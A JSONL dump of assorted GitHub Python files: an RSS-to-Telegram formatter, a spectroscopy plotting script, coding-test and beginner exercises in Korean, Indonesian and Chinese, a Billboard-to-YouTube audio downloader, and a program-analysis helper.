+{"seq_id":"71036795734","text":"import html\nimport logging\nimport os\n\nimport bleach\nimport feedparser\nimport tomlkit\nfrom filelock import FileLock\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_unseen_entries(feed_url, state_file=\"state.toml\"):\n    \"\"\"Get unseen entries from a feed.\"\"\"\n\n    create_state_file(state_file)\n    etag, modified = get_feed_headers(state_file)\n    latest_feed, new_etag, new_modified = fetch_feed(feed_url, etag, modified)\n    save_feed_headers(new_etag, new_modified, state_file)\n    seen_ids = get_seen_entry_ids(state_file)\n    new = [entry for entry in latest_feed.entries if entry.id not in seen_ids]\n    save_entry_ids([entry.id for entry in new], state_file)\n    return new\n\n\ndef format_entry(entry):\n    \"\"\"Format an entry in HTML.\n\n    Clean the HTML to be suitable for Telegram.\"\"\"\n\n    title = html.escape(entry.title)\n    link = entry.link\n    allowed_tags = [\n        \"b\",\n        \"strong\",\n        \"i\",\n        \"em\",\n        \"u\",\n        \"ins\",\n        \"s\",\n        \"strike\",\n        \"del\",\n        \"tg-spoiler\",\n        \"a\",\n        \"tg-emoji\",\n        \"code\",\n        \"pre\",\n        \"li\",  # not really allowed\n    ]\n    allowed_attrs = {\n        \"a\": [\"href\"],\n        \"tg-emoji\": [\"emoji-id\"],\n        \"code\": [\"class\"],\n    }\n\n    content = \"\"\n    for block in entry.content:\n        if block.type in (\"text/html\", \"application/xhtml+xml\"):\n            cleaned = bleach.clean(\n                block.value, tags=allowed_tags, attributes=allowed_attrs, strip=True\n            )\n            cleaned = cleaned.replace(\"\\n\", \" \").replace(\"<li>\", \"\\n• \").replace(\"</li>\", \"\")\n            content += cleaned + \"\\n\"\n\n        elif block.type == \"text/plain\":\n            content += f\"{html.escape(block.value)}\\n\"\n\n    # telegram handles soft hyphens as zero-width spaces and inserts\n    # line breaks without hyphens\n    content = content.replace(\"\\u00ad\", \"\").replace(\"&shy;\", \"\")\n    result = f'<b><a href=\"{link}\">{title}</a></b>\\n{content}'\n    logger.info(f\"Formatted entry: {result!r}\")\n    return result\n\n\ndef create_state_file(file_path):\n    \"\"\"Create a TOML file if it doesn't exist.\"\"\"\n    with FileLock(file_path + \".lock\"):\n        with open(file_path, \"a\") as f:\n            f.write(\"\")\n\n\ndef fetch_feed(feed_url, etag=None, modified=None):\n    \"\"\"Fetch the feed and return parsed feed along with ETag and Last-Modified values.\"\"\"\n    feed = feedparser.parse(feed_url, etag=etag, modified=modified)\n    return feed, feed.get(\"etag\"), feed.get(\"modified\")\n\n\ndef save_feed_headers(etag, modified, file_path):\n    \"\"\"Save the ETag and Last-Modified values to a TOML file.\"\"\"\n    with FileLock(file_path + \".lock\"):\n        with open(file_path, \"r+t\") as f:\n            data = tomlkit.load(f)\n            os.ftruncate(f.fileno(), 0)\n            os.lseek(f.fileno(), 0, os.SEEK_SET)\n            if \"feed\" not in data:\n                feed = tomlkit.table()\n                data[\"feed\"] = feed\n            else:\n                feed = data[\"feed\"]\n            if etag:\n                feed[\"etag\"] = etag\n            if modified:\n                feed[\"modified\"] = modified\n            tomlkit.dump(data, f)\n\n\ndef get_feed_headers(file_path):\n    try:\n        with FileLock(file_path + \".lock\"):\n            with open(file_path, \"r\") as f:\n                data = tomlkit.load(f)\n                feed = data[\"feed\"]\n                etag = feed[\"etag\"] if \"etag\" in feed else None\n                modified = feed[\"modified\"] if \"modified\" in feed else None\n                return etag, modified\n    except (FileNotFoundError, KeyError):\n        print(\"No state file found, fetching feed from scratch.\")\n        return None, None\n\n\ndef save_entry_ids(entry_ids, file_path):\n    \"\"\"Save the seen entry IDs.\"\"\"\n    with FileLock(file_path + \".lock\"):\n        with open(file_path, \"r+t\") as f:\n            data = tomlkit.load(f)\n            os.ftruncate(f.fileno(), 0)\n            os.lseek(f.fileno(), 0, os.SEEK_SET)\n            if \"entries_seen\" not in data:\n                seen = tomlkit.array()\n                seen.multiline(True)\n                data[\"entries_seen\"] = seen\n            else:\n                seen = data[\"entries_seen\"]\n            seen.extend(entry_ids)\n            tomlkit.dump(data, f)\n\n\ndef get_seen_entry_ids(file_path):\n    try:\n        with FileLock(file_path + \".lock\"):\n            with open(file_path, \"r\") as f:\n                data = tomlkit.load(f)\n                return set(data.get(\"entries_seen\", []))\n    except FileNotFoundError:\n        return set()\n","repo_name":"matematiikkakilpailut/matematiikkavalmennusbot","sub_path":"matematiikkavalmennusbot/rss.py","file_name":"rss.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"20434887896","text":"import numpy as np\nfrom scipy import optimize as opt\nfrom scipy import signal\nimport os\nfrom tkinter import filedialog\n\nimport matplotlib.pyplot as plt\nimport asyncio\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport matplotlib.colors as colors\nfrom matplotlib.colors import LinearSegmentedColormap\n\n\ndirpath2d = os.path.dirname(os.path.dirname(__file__))\n\ndef check_npy():\n    filenames = filedialog.askopenfilenames(initialdir = str(dirpath2d), \n                                        title = \"Open Files\") \n    pathtup = filenames\n\n    for datafile in pathtup:\n        arr = np.load(datafile)\n        print(arr)\n\ndef import_trirdata():\n    filenames = filedialog.askopenfilenames(initialdir = str(dirpath2d), \n                                        title = \"Open Files\") \n    pathtup = filenames\n    datadir = os.path.dirname(os.path.dirname(pathtup[0]))\n\n\n    search_files =os.listdir(datadir)\n    for file in search_files:\n        if 'delay_file' in str(file):\n            delayfile= str(file)\n        if 'probe_wn_axis' in str(file):\n            wnfile = str(file)\n\n    print('Delay file loaded')\n    delay = np.load(str(datadir+'/'+delayfile))\n    
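# the delay file stores one delay per row; the first column is rescaled by 1e-3 below (unit conversion, presumably fs to ps)\n    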
print(delay)\n delay = 10**(-3) * (delay[:,0])\n print('wavenumberfile loaded')\n wn = np.load(str(datadir+'/'+wnfile))\n\n d2pump = np.zeros((len(wn),1))\n d2nonpump = np.zeros((len(wn),1))\n for datafile in pathtup:\n arr = np.load(datafile)\n pumped = np.reshape(arr[:,0],(32,1))\n nonpumped = np.reshape(arr[:,1],(32,1))\n d2pump = np.hstack((d2pump,pumped))\n d2nonpump = np.hstack((d2nonpump,nonpumped))\n\n d2pump = d2pump[:,1:]\n d2nonpump = d2nonpump[:,1:]\n \n return delay, wn, d2pump, d2nonpump\n\ndef data_treatment(pump_arr, nonpump_arr):\n data = np.subtract(pump_arr, nonpump_arr)\n return data\n\ndef sub_scan1(DIFF):\n scan1= DIFF[:,0]\n subDIFF = scan1\n for i in range(len(DIFF[0,:])-1):\n subDIFF = np.vstack((subDIFF, scan1))\n \n subDIFF = np.transpose(subDIFF)\n newDIFF = np.subtract(DIFF,subDIFF)\n return newDIFF\n\ndef getOD(P,NP):\n P = -1* np.log10(P)\n NP = -1* np.log10(NP)\n newDIFF = np.subtract(P,NP)\n return newDIFF\n\ndef sub_numerous(DIFF,scannumbers):\n scanlist = str(scannumbers).split(',')\n scanpart= DIFF[:,int(scanlist[0]):int(scanlist[1])]\n scanmid = np.mean(scanpart,axis=1)\n\n subDIFF = scanmid\n for i in range(len(DIFF[0,:])-1):\n subDIFF = np.vstack((subDIFF, scanmid))\n \n subDIFF = np.transpose(subDIFF)\n newDIFF = np.subtract(DIFF,subDIFF)\n return newDIFF\n\n\n\n\n\ndef plot_trir(X,Y,P,colormap,cmin,cmax):\n fig = plt.figure(figsize=(10, 8))\n grid = fig.add_gridspec(6, 6, hspace=0.7, wspace=0.7)\n main_ax = fig.add_subplot(grid[1:-1, 1:])\n y_hist = fig.add_subplot(grid[1:-1, 0],sharey=main_ax)\n x_hist = fig.add_subplot(grid[0, 1:-1], sharex=main_ax)\n\n cdict = {'red': ((0.0, 0.0, 0.0),\n (0.5, 1.0, 1.0),\n (1.0, 1.0, 1.0)),\n\n 'green': ((0.0, 0.0, 0.0),\n (0.25, 0.0, 0.0),\n (0.75, 0.0, 0.0),\n (1.0, 0.0, 0.0)),\n\n 'blue': ((0.0, 1.0, 1.0),\n (0.5, 1.0, 1.0),\n (1.0, 0.0, 0.0)),\n\n 'alpha': ((0.0, 1.0, 1.0),\n # (0.25,1.0, 1.0),\n (0.5, 0.3, 0.3),\n # (0.75,1.0, 1.0),\n (1.0, 1.0, 1.0))}\n\n colormap = LinearSegmentedColormap('BlueRed1', cdict)\n map=main_ax.contourf(X,Y,P,levels=500,cmap=colormap,norm=colors.CenteredNorm(),alpha=.5)#,vmin=cmin,vmax=cmax)\n main_ax.contour(X,Y,P,levels=20,colors='k',alpha=.5,linewidths=.2,vmin=cmin,vmax=cmax)\n fig.colorbar(map, ax=main_ax) \n\n plt.show()\n \n#X,Y,P,NP = import_trirdata()\n\"\"\"\n#print(np.shape(X))\n#print(np.shape(Y))\nprint(np.shape(P))\nprint(np.shape(NP))\n\nI = data_treatment(P,NP)\n\nplot_trir(X,Y,I,'RdBu_r',-0.001,0.001)\n#check_npy()\n \"\"\"\n","repo_name":"MSchick27/spektraM","sub_path":"irspectra/TRIR.py","file_name":"TRIR.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41995186791","text":"def add(index, string):\n index = int(index)\n if 0 <= index <= len(stops):\n back = stops[:index]\n front = stops[index:]\n new = back + string + front\n else:\n new = stops\n return new\n\n\ndef remove(start, end):\n start = int(start)\n end = int(end)\n if 0 <= start <= end < len(stops):\n back = stops[0:start]\n front = stops[end+1:]\n new = back + front\n else:\n new = stops\n return new\n\n\ndef switch(old_string, new_string):\n if old_string in stops:\n new = stops.replace(old_string, new_string)\n else:\n new = stops\n return new\n\n\n\nstops = input()\nwhile True:\n command = input()\n if command == 'Travel':\n break\n command = command.split(':')\n action = command[0]\n if action == 'Add Stop':\n stops = add(command[1], command[2])\n elif action == 'Remove Stop':\n stops = 
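# --- Added sketch (assumptions noted): the getOD() difference signal on toy data ---
# Self-contained illustration of the pump-probe computation in TRIR.py above:
# delta-OD is -log10(pumped) minus -log10(non-pumped). The shapes and noise
# level below are invented; 32 pixels x 5 delays only mirrors the reshape
# to (32, 1) used above.
import numpy as np

rng = np.random.default_rng(0)
pumped = 0.9 + 0.01 * rng.standard_normal((32, 5))
nonpumped = 0.9 * np.ones((32, 5))
delta_od = -np.log10(pumped) + np.log10(nonpumped)  # equivalent to getOD(pumped, nonpumped)
print(delta_od.shape)  # (32, 5)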
remove(command[1], command[2])\n elif action == 'Switch':\n stops = switch(command[1], command[2])\n print(stops)\nprint(f'Ready for world tour! Planned stops: {stops}')\n","repo_name":"kzhelyazkov81/exam_05.07.2020","sub_path":"04_world_tour.py","file_name":"04_world_tour.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15836881852","text":"# 첫째 줄에 N(2 ≤ N ≤ 50)과 M(1 ≤ M ≤ 13)이 주어진다.\n# 둘째 줄부터 N개의 줄에는 도시의 정보가 주어진다.\n# 도시의 정보는 0, 1, 2로 이루어져 있고, 0은 빈 칸, 1은 집, 2는 치킨집을 의미한다. \n# 집의 개수는 2N개를 넘지 않으며, 적어도 1개는 존재한다. 치킨집의 개수는 M보다 크거나 같고, 13보다 작거나 같다.\n\nN, M = map(int, input().split()) # \n\n_map = []\nhome = []\nchicken = []\n\nfor i in range(N):\n _map.append(list(map(int, input().split())))\n\n for j in range(N):\n \n if _map[i][j] == 2:\n chicken.append((i, j))\n\n if _map[i][j] == 1:\n home.append((i, j))\n\n\ntotalA = []\nfor i in home:\n result = 0\n x, y = i\n\n for j in chicken:\n cx, cy = j\n\n total = abs(x - cx) + abs(y - cy)\n \n if result == 0:\n result = total\n totalA.append(result)\n if result > total:\n result = total\n \n\n\nprint(totalA)\nprint(result)\n","repo_name":"mark1346/coding_test_study","sub_path":"minho/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72736673834","text":"'''\nA Program that scrapes the billboard top 100 list and then search for that title/artist on Youtube,\nthen crudely selects the most-likely-to-be-music url out of the search results, then downloads all\nthe songs into a designated folder.\n\nCreated on 2018/May/18 by Junwoo HWANG.\n\nReferences\n------------------------------------------------------------------------------------------------\n1. Returning list from Youtube Query Search : https://stackoverflow.com/questions/29069444/returning-the-urls-as-a-list-from-a-youtube-search-query\n2. Downloading Youtube mp3 files : http://willdrevo.com/downloading-youtube-and-soundcloud-audio-with-python-and-pandas\n3. Billboard charts package : https://github.com/guoguo12/billboard-charts\n4. Check if file exists(or, is a file) : https://stackoverflow.com/questions/82831/how-to-check-whether-a-file-exists\n5. Getting current time in format : https://stackoverflow.com/questions/415511/how-to-get-current-time-in-python\n6. Youtube-dl options : https://github.com/rg3/youtube-dl/blob/master/youtube_dl/YoutubeDL.py\n------------------------------------------------------------------------------------------------\n\nNote\n------------------------------------------------------------------------------------------------\n- maybe use '--no-mtime' option to set time-stamp of Files as the time of creation on memory...\n\n+) There is a Program that collects the most 'likely' to be music from youtube in\nmore thoughtful way! => (https://github.com/ritiek/spotify-downloader)\n\n+) There EXISTS a project that 'automatically creates spotify playlist by using billboard module',\n=> (http://aguo.us/writings/spotify-billboard.html)\n\n+) So if I just add the 'downloader' part, the whole top_100 would be downloaded with album cover\nand everything... 
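# --- Added sketch: nearest chicken-shop distance with min() ---
# A compact, self-contained restatement of the search above: for each house,
# take the smallest Manhattan distance over all chicken shops. The
# coordinates are invented sample data.
home = [(0, 0), (2, 3)]
chicken = [(1, 1), (4, 0)]
nearest = [min(abs(hx - cx) + abs(hy - cy) for cx, cy in chicken)
           for hx, hy in home]
print(nearest)  # [2, 3]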
Muucchhh better!\n------------------------------------------------------------------------------------------------\n'''\n\nimport urllib.request, urllib.parse, urllib.error\nimport urllib.request, urllib.error, urllib.parse\nfrom bs4 import BeautifulSoup\n\nimport youtube_dl\nimport os\n\nimport billboard\n\nimport time\n\n################################################################################\n\ndef get_vid_links_by_Search(text):\n\tquery = urllib.parse.quote(text)\n\turl = \"https://www.youtube.com/results?search_query=\" + query\n\tresponse = urllib.request.urlopen(url)\n\thtml = response.read()\n\tsoup = BeautifulSoup(html, \"html.parser\")\n\n\threfs = [vid['href'] for vid in soup.findAll(attrs={'class':'yt-uix-tile-link'})]\n\tvid_links = [('https://www.youtube.com' + l) for l in hrefs if (l[:9] == '/watch?v=') ]#Select only 'videos'. Not Channel or anything.\n\t#print(('https://www.youtube.com' + vid['href']))\n\n\treturn vid_links\n\n################################################################################\n#############################\nDefault_save_folder = 'MP3_files'\n\n# create YouTube downloader\noptions = {\n\t'format': 'bestaudio/best', # choice of quality\n\t'extractaudio' : True, # only keep the audio\n\t'audioformat' : \"mp3\", # convert to mp3 \n\t'outtmpl': '%(id)s', # name the file the ID of the video\n\t'noplaylist' : True, # only download single song, not playlist\n\t'quiet' : True #Do not print messages to stdout.\n\t}\n\nydl = youtube_dl.YoutubeDL(options)\n\ndef delete_files_in_folder_by_asking(folder_name):\n\tlistdirs = os.listdir(folder_name)\n\tif(len(listdirs) == 0):#Nothing to erase or worry about here.\n\t\treturn\n\n\tprint('\\n\\nWARNING! the files in', folder_name, 'will be DELETED!!!')\n\tprint('SAMPLE files inside include:')\n\tfor i in range( min( 7, len(listdirs) ) ):#Might not have enough(7) items to show, So....\n\t\tprint(listdirs[i])\n\tanswer = input('\\nAre you sure? (Y/N)')\n\tif(answer != 'y' and answer !='Y'):\n\t\tprint('Answer was not Yes, so not gonna delete them!')\n\t\treturn\n\n\tfor the_file in listdirs:\n\t\tfile_path = os.path.join(folder_name, the_file)\n\t\ttry:\n\t\t\tif os.path.isfile(file_path):\n\t\t\t\tos.unlink(file_path)\n\t\t\t#elif os.path.isdir(file_path): shutil.rmtree(file_path)\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\ndef download_mp3_files(link_list, wanted_filename, folder_name = Default_save_folder):\n\t\n\tif(len(link_list) != len(wanted_filename)):\n\t\tprint(\"ERROR : Links and Filenames list doesn't have Equal Length!\")\n\t\tprint('Links', len(link_list), ', Filenames', len(wanted_filename))\n\t\treturn\n\t\n\tif not os.path.exists(folder_name):#If this directory doesn't exist.\n\t\tos.makedirs(folder_name)\n\telse:#Already existed....\n\t\tdelete_files_in_folder_by_asking(folder_name)#Attempt to delete if existing files by asking permission!!\n\n\tfor i in range(len(link_list)):\n\t\tprint('-> Downloading',wanted_filename[i])#Some visual signal to alarm the user...\n\t\tTarget_file_dir = os.path.join(folder_name, wanted_filename[i] + '.mp3')\n\n\t\tif(os.path.exists(Target_file_dir)):#If it exists either in Folder / File... 
Don't mess with it.\n\t\t\tprint('File',Target_file_dir,'already exists, backing off...')\n\t\t\tcontinue\n\t\telse:\n\t\t\tresult = ydl.extract_info(link_list[i], download=True)#RICH of INFORMATION about that VIDEO tho!!!!!!\n\t\t\tos.rename(result['id'], Target_file_dir) # Move file.\n\n################################################################################\n\ndef Scrape_latest_Billboard_Top_100(max_count = 10, save_links_to_txt = False):\n\tprint('Scrape_latest_Billboard_Top_100 STARTING...')\n\n\tcounter = 0\n\tLinks = []\n\tFileNames = []\n\n\tYMDHMS_str = time.strftime(\"%Y-%m-%d_%H%M%S\", time.gmtime())#TIMESTAMP.\n\tSave_link_txt_dir = 'hot-100_' + YMDHMS_str + '.txt'#BASIC filename...\n\tlink_save_stream = open(Save_link_txt_dir, 'wt')\n\n\tchart = billboard.ChartData('hot-100')\n\tStart_time = time.time()\n\tfor song in chart:\n\t\tsearch_text = song.artist + ' - ' + song.title\n\t\tprint('Adding candidate :', search_text)#Friendly message\n\t\tlink_candidates = get_vid_links_by_Search(search_text)\n\t\tLinks.append(link_candidates[0])#Most likely to be the official release(most likely MV)\n\t\tFileNames.append(search_text)\n\n\t\tif(save_links_to_txt):\n\t\t\t#Format, argh. did %s first time. got %s,%s,%s... annoying.\n\t\t\tFormated_str = '{},{},{}\\n'.format(song.artist,song.title,link_candidates[0])\n\t\t\tlink_save_stream.write(Formated_str)\n\n\t\tcounter += 1\n\t\tif(counter % 5 == 0):#Show some stats.\n\t\t\tSec_per_candidate = (time.time() - Start_time) / counter\n\t\t\tprint('Counter:',counter,'/',max_count)\n\t\t\tprint('Sec per selecting Candidate:', Sec_per_candidate)\n\t\t\tprint('Remaining time:', (max_count - counter) * Sec_per_candidate, 'Seconds' )\n\n\t\tif(counter >= max_count):\n\t\t\tbreak#Out of for statement.\n\t\n\tif(save_links_to_txt):\n\t\tlink_save_stream.close()\n\t\n\tdownload_mp3_files(Links, FileNames, 'Hot_100')#DOWNLOAD!\n\n################################################################################\n\n#first = get_vid_links_by_Search('Rick Rolling')[0]\n#print(get_vid_links_by_Search('HAHAHA'))\n#download_mp3_files([first], ['BlahBlah'])\n\nScrape_latest_Billboard_Top_100(100, True)\n\ninput('Waiting...')\n\n################################################################################","repo_name":"junwoo091400/MyCODES","sub_path":"small_Projects(memory)/Billboard_hot100_downloader_by_youtube/Billboard_hot100_downloader.py","file_name":"Billboard_hot100_downloader.py","file_ext":"py","file_size_in_byte":6969,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17848915870","text":"from kv_database_be.log import logger\nfrom kv_database_be.constants import avail_benchmarks, avail_options\n\ndef get_avail_benchmarks():\n list_of_benchmarks = []\n for key in avail_benchmarks:\n benchmark = {\n \"label\": key,\n \"description\": avail_benchmarks[key]\n }\n list_of_benchmarks.append(benchmark)\n return list_of_benchmarks\n\ndef get_avail_options():\n return avail_options\n\ndef create_options_file(content):\n f=open(\"tmp_options.ini\",\"wb\")\n f.write(content)\n f.close()\n return True","repo_name":"HubDish/kv-database-api","sub_path":"kv_database_be/handlers/h_common.py","file_name":"h_common.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35962041716","text":"from typing import Tuple, Dict, Set, cast\n\nfrom discopop_explorer.PETGraphX import EdgeType, DepType, 
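# --- Added sketch: keeping only '/watch?v=' hrefs, as in get_vid_links_by_Search() ---
# Self-contained illustration of the link-filtering step above; the href list
# is an invented stand-in for the BeautifulSoup results.
hrefs = ['/watch?v=abc123', '/channel/UCxyz', '/watch?v=def456&list=PL1']
vid_links = ['https://www.youtube.com' + h for h in hrefs
             if h.startswith('/watch?v=')]
print(vid_links)  # two watch URLs; the channel link is dropped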
PETGraphX, NodeID, CUNode, MemoryRegion\nfrom discopop_explorer.pattern_detectors.combined_gpu_patterns.classes.Aliases import (\n VarName,\n)\n\n\ndef get_written_and_read_memory_regions_by_cu(\n contained_regions, pet: PETGraphX\n) -> Tuple[Dict[NodeID, Set[MemoryRegion]], Dict[NodeID, Set[MemoryRegion]]]:\n all_function_cu_ids: Set[NodeID] = set()\n for region in contained_regions:\n parent_function = pet.get_parent_function(pet.node_at(region.node_id))\n\n subtree = pet.subtree_of_type(parent_function, CUNode)\n all_function_cu_ids.update([NodeID(n.id) for n in subtree])\n\n written_memory_regions_by_cu_id: Dict[NodeID, Set[MemoryRegion]] = dict()\n read_memory_regions_by_cu_id: Dict[NodeID, Set[MemoryRegion]] = dict()\n for cu_id in all_function_cu_ids:\n in_dep_edges = pet.in_edges(cu_id, EdgeType.DATA)\n out_dep_edges = pet.out_edges(cu_id, EdgeType.DATA)\n\n written_memory_regions = [\n MemoryRegion(cast(str, d.memory_region))\n for s, t, d in in_dep_edges\n if (d.dtype == DepType.RAW or d.dtype == DepType.WAW)\n and d.memory_region is not None\n and len(d.memory_region) != 0\n ]\n written_memory_regions += [\n MemoryRegion(cast(str, d.memory_region))\n for s, t, d in out_dep_edges\n if (d.dtype == DepType.WAR or d.dtype == DepType.WAW)\n and d.memory_region is not None\n and len(d.memory_region) != 0\n ]\n\n read_memory_regions = [\n MemoryRegion(cast(str, d.memory_region))\n for s, t, d in in_dep_edges\n if (d.dtype == DepType.WAR)\n and d.memory_region is not None\n and len(d.memory_region) != 0\n ]\n read_memory_regions += [\n MemoryRegion(cast(str, d.memory_region))\n for s, t, d in out_dep_edges\n if (d.dtype == DepType.RAW)\n and d.memory_region is not None\n and len(d.memory_region) != 0\n ]\n\n if cu_id not in written_memory_regions_by_cu_id:\n written_memory_regions_by_cu_id[cu_id] = set()\n written_memory_regions_by_cu_id[cu_id] = set(written_memory_regions)\n\n if cu_id not in read_memory_regions_by_cu_id:\n read_memory_regions_by_cu_id[cu_id] = set()\n read_memory_regions_by_cu_id[cu_id] = set(read_memory_regions)\n return written_memory_regions_by_cu_id, read_memory_regions_by_cu_id\n\n\ndef get_cu_and_varname_to_memory_regions(\n contained_regions, pet: PETGraphX, written_memory_regions_by_cu: Dict[NodeID, Set[MemoryRegion]]\n) -> Dict[NodeID, Dict[VarName, Set[MemoryRegion]]]:\n # dict -> {Cu_ID: {var_name: [memory regions]}}\n result_dict: Dict[NodeID, Dict[VarName, Set[MemoryRegion]]] = dict()\n\n all_function_cu_ids: Set[NodeID] = set()\n for region in contained_regions:\n parent_function = pet.get_parent_function(pet.node_at(region.node_id))\n\n subtree = pet.subtree_of_type(parent_function, CUNode)\n all_function_cu_ids.update([NodeID(n.id) for n in subtree])\n\n for cu_id in all_function_cu_ids:\n if cu_id not in result_dict:\n result_dict[cu_id] = dict()\n\n # only out_deps considered, as in_deps might use variable names\n # which originate from different source code scopes\n out_dep_edges = pet.out_edges(cu_id, EdgeType.DATA)\n for _, _, dep in out_dep_edges:\n if dep.var_name is None or dep.memory_region is None or len(dep.memory_region) == 0:\n continue\n if dep.var_name not in result_dict[cu_id]:\n result_dict[cu_id][VarName(dep.var_name)] = set()\n result_dict[cu_id][VarName(dep.var_name)].add(dep.memory_region)\n\n return result_dict\n\n\ndef get_memory_region_to_cu_and_variables_dict(\n cu_and_variable_to_memory_regions: Dict[NodeID, Dict[VarName, Set[MemoryRegion]]]\n) -> Dict[MemoryRegion, Dict[NodeID, Set[VarName]]]:\n # inverts the given 
cu_and_variable_to_memory_regions dictionary\n result_dict: Dict[MemoryRegion, Dict[NodeID, Set[VarName]]] = dict()\n\n for cu_id in cu_and_variable_to_memory_regions:\n for var_name in cu_and_variable_to_memory_regions[cu_id]:\n for mem_reg in cu_and_variable_to_memory_regions[cu_id][var_name]:\n if mem_reg not in result_dict:\n result_dict[mem_reg] = dict()\n if cu_id not in result_dict[mem_reg]:\n result_dict[mem_reg][cu_id] = set()\n result_dict[mem_reg][cu_id].add(var_name)\n return result_dict\n","repo_name":"discopop-project/discopop","sub_path":"discopop_explorer/pattern_detectors/combined_gpu_patterns/step_1.py","file_name":"step_1.py","file_ext":"py","file_size_in_byte":4697,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"72"} +{"seq_id":"40490099704","text":"\n#sequence(runtut)\n#konversi celcius ke farenheit\n\nprint('==konversi celcius ke farenheit==')\n\nc=int(input('masukkan celcius'))\nf=9/5*c+32\nprint('suhu celcius=',c,'suhu farenheit=',f)\n\n\n#menghitung luas segitiga\n\nprint('==luas segitiga==')\n\na=int(input('alas='))\nt=int(input('tinggi='))\n\nl=1/2*a*t\nprint('alas=',a,'tinggi=',t,'luas=',l)\n\n#menghitung luas lingkaran\n\nprint('==luas lingkaran==')\n\nr=int(input('jari jari='))\nl=22/7*r**2\nprint('jari jari=',r,'luas=',l)\n\n#branching(selection)\n# syntax if ke-1 satu cabang\n#oddnumber\nprint('==oddnumber==')\nnum=int(input('masukkan angka='))\noddnum=None\nif num%2==1 :\n\toddnum=num\nprint(oddnum)\n\n\n#cari nilai max\n#tidak indentasi(tab)\n\nprint('==maxnumber==')\n\nnum1=int(input('masukkan angka-1='))\nnum2=int(input('masukkan angka-2='))\nif num1num2:\n\tmaxnum=num1\nprint(maxnum)\n\n#indentasi\nif num1num2:\n\tmaxnum=num1\n\tprint(maxnum)\n\n#syntax if ke-2 2 cabang\nif num130 and grade<=50:\n\tprint('C')\nif grade>50 and grade<=80:\n\tprint('B')\nif grade >80 and grade<=100:\n\tprint('A')\n\t\n#elif\ngrade=int(input('masukkan nilai='))\nif grade>0 and grade<=30:\n\tprint('D')\nelif grade>30 and grade<=50:\n\tprint('C')\nelif grade>50 and grade<=80:\n\tprint('B')\nelse:\n\tprint('A')\n\t\n#Looping(repetition) pengulangan\n\nprint('==LOOP==')\n\nfor i in range(3):\n\tprint(i)\nprint('end of iteration')\n\nfor i in range(6):\n\tprint(i+5)\nprint('end of iteration')\n\n#number=int(input('masukkan angka maks='))\nfor i in range(number):\n\tif i%2==1:\n\t\tprint('bilangan ganjil =',i)\nprint('==range==')\ntemp=0\nnumber=int(input('masukkan angka maks='))\nfor i in range(number):\n\tif i%2==1:\n\t\ttemp=temp+i\n\t\tprint('bilangan ganjil =',i)\nprint('jumlah angka ganjil =',temp)\n\n#2, 4, 6, 8, 10, .....\n#un=a+(n-1)b\nprint('==DERET==')\na=2\nb=2\nfor i in range(10):\n\tn=i+1\n\tun=a+(n-1)*b\n\tprint(un)\n\t\n#cara lain deret\nprint('==DERET==')\nfor i in range(2,21,2):\n\tprint(i)\n\t\n#cara lain\na=2\nfor i in range (10):\n\tprint(a)\n\ta=a+2\n\t\n#cara lain\na=2\ntemp=0\nfor i in range(10):\n\tprint(temp)\n\ttemp=temp+a\n\ta=a+2\nprint('jumlah=',temp)\n","repo_name":"dewialqurani/ALPRO_SEMESTER1","sub_path":"LATIHAN CCODING/maxnum,grade,loop.py","file_name":"maxnum,grade,loop.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40580741948","text":"#!/usr/bin/env python\n# coding: utf-8\n# This is my first notebook for learning python\n# refrence https://github.com/wesm/pydata-book\n# credit to Wes McKinney and Xu Liang\n\n# In[2]:\n\n\ns = 'python' #字符串可以是单引号或双引号\na = list(s)\nb = a[:3] \nc = s[:3] 
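# --- Added sketch: the u_n = a + (n-1)*b progression in closed form ---
# Self-contained check of the 2, 4, ..., 20 series loops above, with the
# closed-form sum n*(first + last)/2 as a cross-check.
a, b, n = 2, 2, 10
terms = [a + (k - 1) * b for k in range(1, n + 1)]
print(terms)  # [2, 4, 6, ..., 20]
print(sum(terms), n * (terms[0] + terms[-1]) // 2)  # both 110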
#注意b和c的类型差异,list和str\n\n\n# In[6]:\n\n\ns = '12\\\\34' # \\ 是转义字符\nprint(s) #print() 以及和直接s的区别\n\n\n# In[9]:\n\n\ns = r'this\\ is\\ a \\test' #前面加r代表每一个\\都是两个\\\\\ns\n\n\n# In[10]:\n\n\na = 'hello'\nb = 'world'\na + b #字符串合并\n\n\n# In[11]:\n\n\n#字符串格式化\ntemplate = '{0:.2f}{1:s} are worth US${2:d}'\n#{0:.2f} 表示第一个参数格式化为 2位浮点小数的浮点数\n#{1:s} 表示第二个参数格式化位字符串\n#{2:d} 表示第三个参数格式化为整数\ntemplate.format(4.5560,'Argentine Pesos',1)\n\n\n# In[16]:\n\n\n#日期和时间\n#内建datetime模块\nfrom datetime import datetime, date, time\ndt = datetime(2011, 10, 29, 20, 30 ,21)\ndt.day\ndt.date()\n\n\n# In[18]:\n\n\n#datetime转换为字符串,strftime\ndt.strftime('%m/%d/%Y %H:%M')\n\n\n# In[19]:\n\n\n#字符串转为datetime对象,strptime\ndatetime.strptime('20091031','%Y%m%d')\n\n\n# In[20]:\n\n\n#替换\ndt.replace(minute = 0,second = 0)\n#datetime是不可变类型,以上方法是产生新的对象\n\n","repo_name":"Cassie-Qiu68/Python-Learner","sub_path":"Python lesson One - basic .py","file_name":"Python lesson One - basic .py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 